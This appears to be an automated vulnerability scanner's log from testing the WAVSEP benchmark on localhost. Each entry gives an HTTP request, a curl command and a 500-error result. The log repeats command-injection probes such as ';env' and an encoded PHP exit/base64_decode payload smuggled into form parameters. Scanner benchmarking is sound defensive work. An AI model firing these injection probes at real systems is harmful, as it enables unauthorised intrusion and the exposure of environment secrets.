curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp?username=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msg
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp?msg=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp?msg=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp?transactionId=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp?transactionId=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp?msgId=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp?msgId=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp?minBalanace=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp?minBalanace=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp?msgid=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp?msgid=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp?transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp?transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp?transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp?transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp?transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp?transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp?transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp?transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp?transactionDate=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp?transactionDate=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp?transactionId=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp?transactionId=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp?msgId=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp?msgId=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp?minBalanace=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp?minBalanace=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp?msgid=%3Benv HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp?msgid=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case01-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnIvFailure.jsp?username=%3Benv&password=textvalue2 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case01-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnIvFailure.jsp?username=%3Benv&password=textvalue2"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case02-FalsePositiveInjectionInLogin-PsAndIv-500SyntaxErrorOnIvFailure.jsp?username=%3Benv&password=textvalue2 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case02-FalsePositiveInjectionInLogin-PsAndIv-500SyntaxErrorOnIvFailure.jsp?username=%3Benv&password=textvalue2"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case06-FalsePositiveInjectionInLogin-HoneyPotNoSQL-Fake500SyntaxErrorOnIvFailure.jsp?username=%3Benv&password=textvalue2 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case06-FalsePositiveInjectionInLogin-HoneyPotNoSQL-Fake500SyntaxErrorOnIvFailure.jsp?username=%3Benv&password=textvalue2"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case07-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnUnrelatedSyntaxError.jsp?username=%3Benv&password=textvalue2 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case07-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnUnrelatedSyntaxError.jsp?username=%3Benv&password=textvalue2"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
